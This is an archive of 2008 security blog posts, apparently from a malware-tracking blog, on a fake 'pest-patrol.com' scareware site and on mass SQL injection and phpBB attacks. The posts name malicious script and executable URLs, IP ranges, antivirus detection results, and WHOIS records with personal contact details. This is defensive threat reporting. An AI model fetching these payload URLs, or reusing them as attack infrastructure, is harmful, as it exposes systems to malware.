Sponsored by..

Tuesday 27 May 2008

pest-patrol.com is not the real PestPatrol - part II

The fake pest-patrol.com site we mentioned a few days ago has fixed its download problem and has given us a sample. Like many of these fake anti-malware sites, the executable morphs continually to avoid protection.

Detection rates are not good (VirusTotal results), and the real PestPatrol / eTrust product doesn't pick it up yet.

I strongly suspect that there's nothing good in the 85.255.112.0 - 85.255.127.255 range at all, and it is probably a good idea to block access to that entire IP block.

Antivirus;Version;Last Update;Result
AhnLab-V3;2008.5.22.1;2008.05.27;-
AntiVir;7.8.0.19;2008.05.27;SPR/Dldr.PestPatr.A
Authentium;5.1.0.4;2008.05.26;-
Avast;4.8.1195.0;2008.05.27;-
AVG;7.5.0.516;2008.05.26;-
BitDefender;7.2;2008.05.27;-
CAT-QuickHeal;9.50;2008.05.26;-
ClamAV;0.92.1;2008.05.27;-
DrWeb;4.44.0.09170;2008.05.27;-
eSafe;7.0.15.0;2008.05.26;-
eTrust-Vet;31.4.5826;2008.05.27;-
Ewido;4.0;2008.05.26;-
F-Prot;4.4.4.56;2008.05.26;-
F-Secure;6.70.13260.0;2008.05.27;-
Fortinet;3.14.0.0;2008.05.27;-
GData;2.0.7306.1023;2008.05.27;-
Ikarus;T3.1.1.26.0;2008.05.27;-
Kaspersky;7.0.0.125;2008.05.27;not-a-virus:Downloader.Win32.FraudLoad.bz
McAfee;5303;2008.05.26;-
Microsoft;1.3520;2008.05.27;-
NOD32v2;3134;2008.05.27;-
Norman;5.80.02;2008.05.26;-
Panda;9.0.0.4;2008.05.27;-
Prevx1;V2;2008.05.27;-
Rising;20.46.12.00;2008.05.27;-
Sophos;4.29.0;2008.05.27;-
Sunbelt;3.0.1123.1;2008.05.17;-
Symantec;10;2008.05.27;-
TheHacker;6.2.92.320;2008.05.26;-
VBA32;3.12.6.6;2008.05.27;-
VirusBuster;4.3.26:9;2008.05.26;-
Webwasher-Gateway;6.6.2;2008.05.27;Riskware.Dldr.PestPatr.A

chliyi.com - another injection attack

Thanks to Dancho Danchev for the heads up, it looks like there's another SQL injection attack on the loose, this time pointing to chliyi.com/reg.js, with about 10,000 hits currently on Google for a variety of sites.

Reportedly, this launches some sort of ActiveX attack via obfuscated VBscript. This is another good reason not to use Internet Explorer, as most other browsers do not support ActiveX and are not vulnerable.

Unlike some other recent injection attacks, this one seems to use a legitimate domain called chliyi.com - unfortunately for the bad guys, the registration on the domain is going to run out pretty soon.

Domain Name.......... chliyi.com
Creation Date........ 2003-06-12 11:21:39
Registration Date.... 2003-06-12 11:21:39
Expiry Date.......... 2008-06-12 11:21:39
Organisation Name.... junrong shen
Organisation Address. dongxiaoqiao3-1-104
Organisation Address.
Organisation Address. suzhou
Organisation Address. 215006
Organisation Address. JS
Organisation Address. CN

Admin Name........... shen junrong
Admin Address........ dongxiaoqiao3-1-104
Admin Address........
Admin Address........ suzhou
Admin Address........ 215006
Admin Address........ JS
Admin Address........ CN
Admin Email.......... wzh@hisuzhou.com
Admin Phone.......... +86.51265678898
Admin Fax............ +86.51257306265

Tech Name............ zhihui wang
Tech Address......... suzhou
Tech Address.........
Tech Address......... suzhou
Tech Address......... 215021
Tech Address......... JS
Tech Address......... CN
Tech Email........... wzh@hisuzhou.com
Tech Phone........... +86.5169697639
Tech Fax............. +86.5167621807

Bill Name............ zhihui wang
Bill Address......... suzhou
Bill Address.........
Bill Address......... suzhou
Bill Address......... 215021
Bill Address......... JS
Bill Address......... CN
Bill Email........... wzh@hisuzhou.com
Bill Phone........... +86.5169697639
Bill Fax............. +86.5167621807
Name Server.......... dns22.hichina.com
Name Server.......... dns21.hichina.com
The IP address of the server is 218.30.96.87 which is not in the Spamhaus DROP list which indicates again that the chliyi.com might well be legitimate, just compromised.

This is another attack that goes to show that "there is no such thing as a safe site". A scan of the Google results comes up with some interesting (and alarming) infected sites:

  • forces.ca - Canadian military
  • paramountcomedy.com - Paramount Comedy (Cable TV channel)
  • kcsg.com - KCSG (Utah TV station)
  • umnh.utah.edu - University of Utah
  • digital.lib.ecu.edu - East Carolinia Unitersity
  • chapel.duke.edu - Duke University
  • drdrew.com - Dr Drew (relationship advice)
  • gisp.org - Global Invasive Species Program
  • sciencescotland.org - Royal Society of Scotland
  • moffitt.org - H. Lee Moffitt Cancer Center and Research Institute
  • confetti.co.uk - Confetti (Wedding planning)
  • buildabear.com - Build-a-Bear Workshop
  • delluniversity.com - Dell
  • trelleborg.com - Trelleborg AB (Polymer manufacturer)
None of these are huge sites when it comes to traffic, but there are some well-known names there and certainly some which you would hope would be more secure. Out of the other infected sites, it seems that the US Canada, Australia, the UK and Ireland seem to have the biggest cluster of infected sites with very few showing outside those countries.

This is not a comprehensive list of infected sites, and many of these sites will have been cleaned up.

If you are running an SQL server, then the rule is to secure your inputs, else you will get attacked again and again.

Wednesday 21 May 2008

pest-patrol.com is not the real PestPatrol

Thanks to Dancho Danchev for pointing out pest-patrol.com, yet another dodgy looking scareware site. Of course, the real PestPatrol is a pretty well known and legitimate anti-spyware product from CA, the one with the hyphen in the middle is definitely trying to pass itself off as the real thing. (Click the thumbnail for a larger picture).



The fake pest-patrol.com is hosted on 85.255.121.181 in the Ukraine, a range of network addresses that features on the Spamhaus DROP list, and has domain registration service from Estdomains which always seems to be a popular choice with dodgy web sites.

The bottom of the page has a copyright notice claiming that it was created by "Pest Patrol, Inc.", but that is likely to be fake. A large amount of text has been copied and pasted directly from the real CA site. The "PestPatrol" name is pretty widely registered as a trademark, so apart from anything else, this fake pest-patrol.com site is clearly violating CA's trademark rights.

What's interesting about this is just how the pest-patrol.com domain ended up in the hands of a bunch of guys in Eastern Europe. Although the "PestPatrol" name is trademarked, that only applies to computer software. As is turns out, the original pest-patrol.com controlled pests of the creepy crawly variety. CA (or SaferSite Inc as it was before CA took over) would have had no claim over the domain name as it wasn't violating any trademark or causing confusion. But eventually the name expired and after being dropped a couple of times it ended up with someone who clearly is using it to violate a trademark.

The lesson for businesses is perhaps that they need to keep an eye on domains that could potentially violate a trademark or be confusing and secure them if they expire, several registrars can back order domain names. In the long run, that's probably easier than trying to track down an anonymous registrant from the former Soviet Union.

The download option on pest-patrol.com doesn't work at present, but it could be similar to this one (VirusTotal scan results) which appears on a sister site. Unfortunately, CA's genuine product doesn't seem to detect it..

Sunday 11 May 2008

Mass phpBB attack free.hostpinoy.info and xprmn4u.info

Another injection attack reported by the ISC, and this time it appears to be using one of many potential flaws in phpBB. Injected code points to free.hostpinoy.info/f.js and xprmn4u.info/f.js, and a Google search of these two terms currently comes up with 858,000 matches between them indicating that this is a very large scale attack.

phpBB is a great bit of software, but sadly it is riddled with security holes and requires constant updating. If you're running a phpBB forum then you need to patch it as a matter or urgency. If you don't run phpBB and are looking at running a forum then I've got to say.. try something else.

It looks like some version of the Zlob trojan is being served up, see here and here for more details. (Thanks sowhatx). Detection rates seem to be patchy. It's possible that the injected code is using some sort of geotargetting as the destination sites are not consistent.

free.hostpinoy.info is 209.51.196.254 (XLHost.com)
xprmn4u.info is 217.199.217.9 (Mastak.ru)

Updated: A brief analysis of some of the impacted sites shows a mix of high traffic forums and long-dead ones. Some of these forums are hit with multiple exploits and massive amounts of spam, which indicates that they are running a very out of date version of phpBB.. so folks, if you have a forum which you don't use any more, do everyone a favour and delete it.

Wednesday 7 May 2008

winzipices.cn and bbs.jueduizuan.com - another SQL injection attack

The ISC has warned about another SQL Injection attack, following on from this one a few weeks ago. This time the injection is inserting a script pointing to the winzipices.cn and bbs.jueduizuan.com domains.

The malicious script is pointing to winzipices.cn/1.js, winzipices.cn/2.js, winzipices.cn/3.js, winzipices.cn/4.js and winzipices.cn/5.js and also bbs.jueduizuan.com/ip.js. As ever, don't visit these sites unless you know what you are doing.

Right at the moment, winzipices.cn is coming up with a server error, but bbs.jueduizuan.com is functioning just fine. This tries to attack visiting systems using the MS07-004 vulnerability, a RealPlayer vulnerability plus it attempts to download an executable from www.bluell.cn/ri.exe possibly using a shell vulnerability (VirusTotal analysis here, mostly detected as Trojan.Win32.Agent.lpv, Trojan.MulDrop.origin or TR/Dropper.Gen).

Some IP addresses:
www.bluell.cn is 60.191.239.219
winzipices.cn is 60.191.239.229
bbs.jueduizuan.com is 60.191.239.219

My recommendation is to block access to the entire 60.191.239.x range if you can.

The the moment, a Google search for winzipices.cn shows 1790 matches, for jueduizuan.com it is 1640 matches. Expect those figures to climb sharply.

If you are running an impacted SQL server, then you need to secure it and perform better validation, else the problem will happen again. Client machines should be protected if they are fully up-to-date on patches, if you have been infected then use the excellent Secunia Software Inspector to check your system for vulnerable apps.

As always, there are some high profile sites that have been compromised. They may well have been cleaned up by now, so inclusion here does not mean that they are unsafe or safe to visit.

bbs.jueduizuan.com
  • safecanada.ca (Canadian Homeland Security again).
  • breastcanceradvice.com, arthritisissues.com, menssexhealth.com, www.bipolardepressioninfo.com (Health)
  • dubaicityguide.com (Travel)
  • classicdriver.com (Motoring)
winzipices.cn
  • imo.org (International Maritime Organisation)
  • cifas.org.uk (Fraud Prevention)
  • hmdb.org (Historical Marker Database)
  • abbyy.com (OCR software)
  • cancerissues.com, adhdissues.com, depressionissues.com, diabeticdiets.org, erectilefacts.com, prostatecancerissues.com, digestivefacts.com (Health)
  • www.asiamedia.ucla.edu, www.international.ucla.edu, www.asiaarts.ucla.edu, www.isop.ucla.edu (UCLA)
  • newmarket.travel (Travel)
  • discoverireland.ie (Travel)
  • gay.tv (Lifestyle)
Some of these sites are regularly infected with SQL injection attacks, and safecanada.ca was infected with the last major outbreak. The problem is that once a site has been attacked and enumerated, then it will be attacked again and again until it is fixed.

As mentioned before, there is no such thing as a safe site.